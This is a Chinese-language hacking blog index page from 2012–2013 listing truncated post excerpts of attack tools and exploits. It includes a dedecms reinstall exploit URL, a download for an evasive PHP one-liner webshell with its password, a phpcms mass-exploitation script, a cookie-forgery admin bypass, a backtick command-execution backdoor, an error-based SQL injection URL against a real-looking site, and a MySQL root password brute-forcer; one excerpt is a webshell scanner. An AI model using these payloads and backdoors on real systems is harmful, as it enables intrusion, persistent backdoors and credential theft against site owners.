dedecms 躺着也中枪 爆重装漏洞

分类:安全 | 2013-06-30 | 撸过 1,870 次
4人扯谈

利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.

http://webshell.cc/install/index.php.bak?insLockfile=1

dedecms死的太冤枉了. apache的原因.

Zend加密 免杀PHP一句话藐视所有IIS防御软件

分类:工具 | 2012-04-27 | 撸过 984 次
1人扯谈

话不多 直接截图。。。 抓紧下!

PHP一句话密码:caidao

 

下载地址:caidao

网盘下载:caidao.zip

文件大小:1 KB

phpcms-exp 0day

分类:安全 | 2012-03-9 | 撸过 917 次
0人扯谈
<?php
error_reporting(E_ERROR);
set_time_limit(0);

$keyword=’inurl:about/joinus’ ; // 批量关键字
$timeout = 1;
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file(‘url.txt’);
if (in[......]

继续阅读

搜一次 cms php 通杀

分类:安全 | 2012-03-5 | 撸过 424 次
1人扯谈

洞文件 admin 目录下的 admin_loginstate.php

看代码

if(empty($_COOKIE['S_AdminID'])){
  echo "<script>window.location='admin_login.php'</script>";
  exit;
  }
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){[......]

继续阅读

一个官方没有公布的php秘籍,可用作后门

分类:安全 | 2012-03-3 | 撸过 708 次
1人扯谈

发现这个也是巧合,我就直接说了吧

<?php
//t.php
$test = $_GET['r'];
echo `$test`;
?>

大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webs[......]

继续阅读

php 源码审计之 cookies 欺骗

分类:安全 | 2012-02-23 | 撸过 400 次
0人扯谈

ebycms是一套手机音乐cms系统

直接上代码

admin目录下的in.php

<?php require_once('L:/wamp/www//fern.php');
Annotation("L:\wamp\www\eby\admin\in.php_0");

define(EBY_IN,TRUE);
define('ADMIN_ROOT',  str_replace("\","/",dirname(__FILE__))."/");
define('EBY_ROOT',dirname(ADMIN_ROOT).'/');

require_once (EBY_ROOT.'contr[......]

继续阅读

PHP遍历单目录可写权限脚本

分类:工具 | 2012-02-19 | 撸过 392 次
0人扯谈
PHP遍历单目录可写权限脚本

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />[......]

继续阅读

php+mysql高级爆错注入经测算有效

分类:安全 | 2012-02-19 | 撸过 1,342 次
1人扯谈

之前想找个测试 没想到这有 可以测试下做个记录而已

https://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003[......]

继续阅读

PHP Mysql 密码暴力破解,root密码破解 源码

分类:工具 | 2012-01-25 | 撸过 951 次
5人扯谈
<?
set_time_limit(0);                                   //脚本不超时

$ip = "localhost";                                   //IP
$user = "root";                                      //用户名
$passwd = file("password.txt");                      //密码字典

for($i=0; $i<count($passwd); $i++){
    $pass = Str[......]

继续阅读

PHP Web 木马扫描器代码

分类:技术 | 2012-01-18 | 撸过 780 次
1人扯谈

scanner.php:

<?php
/**************PHP Web木马扫描器************************/
/* [+] 作者: alibaba */
/* [+] QQ: 1499281192 */
/* [+] MSN: weeming21@hotmail.com */
/* [+] 首发: t00ls.net , 转载请注明t00ls */
/* [+] 版本: v1.0 */
/* [+] 功能: web版php木马扫描工具*/
/* [+] 注意: 扫描出来的文件并不一定就是后门, */
/* 请自行判断、审核、对比原文件。*/
/* 如果你[......]

继续阅读

第 1 页,共 4 页1234